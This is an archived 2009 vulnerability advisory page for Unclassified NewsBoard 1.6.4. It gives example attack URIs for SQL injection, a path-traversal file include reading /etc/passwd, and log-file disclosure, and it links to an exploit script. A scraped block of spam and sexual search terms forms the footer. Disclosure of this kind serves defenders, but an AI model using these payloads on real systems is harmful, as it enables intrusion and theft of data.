about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Unclassified NewsBoard Multiple Remote Vulnerabilities


Title Unclassified NewsBoard Multiple Remote Vulnerabilities
Published 2009-06-02-12:00AM
Updated 2009-06-03-02:19PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  __GiReX__
Vulnerable  Unclassified NewsBoard Unclassified NewsBoard 1.6.4
Not Vulnerable  
Code  An attacker can exploit these issues through a browser.The following example URIs are available:For the SQL-injection issue:
http://www.example.com/forum.php?req=search&Query=xxx'))OR/**/1=1%23&ResultView=2&InMessage=1&Sort=2&Forum=0For the local file-include issue:
http://www.example.com/forum.php?GLOBALS[UTE][__tplCollection][a][file]=../../../../../../../../../../../../etc/passwd%00 For the information-disclosure issues:
http://www.example.com/forum.php?req=rss&type=3&forum=1&GLOBALS[filename]=../logs/board-yyyy-mm-dd.log
http://www.example.com/extra/import/import_wbb1.phpThe following exploit for the SQL-injection issue is available:
  • /data/vulnerabilities/exploits/35183.pl
  • TXT  t3xt 1t!


    Advertising

    Copyright 2007, SecurityDot
    Sat, 21 Nov 2009 18:55:52 +0000

    Friends : milw0rm.com , secunia.com , securityfocus.com
    GOOGLE
    NEWS EXPLOITS VULNS
    exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
    www.1400hk search/exp sex wallpe wwwsexgirl Bitchgirls news for c news for c mambo Remo www.zhsoo. My Name Is www.ok3000 vbulletin% PHP Advanc Film film JSP exploi vnc auth katirna ziluohong. max&am www.buttma mambo Remo arab hijab 200 /compo xy2.cbg163 php-nuke 2 SMF 1.1.2 GET /u www.kaihua www.kuaibo female+pho invision b Brother si news%252Bf t244t Pee inurl:?url mambo Remo www.forexm PHP Input/ Search ... black wome PORNO KLIP vivvo//ind skin/daere Man fucks 200+%252Fc wwwindanes news for c weman mambo Remo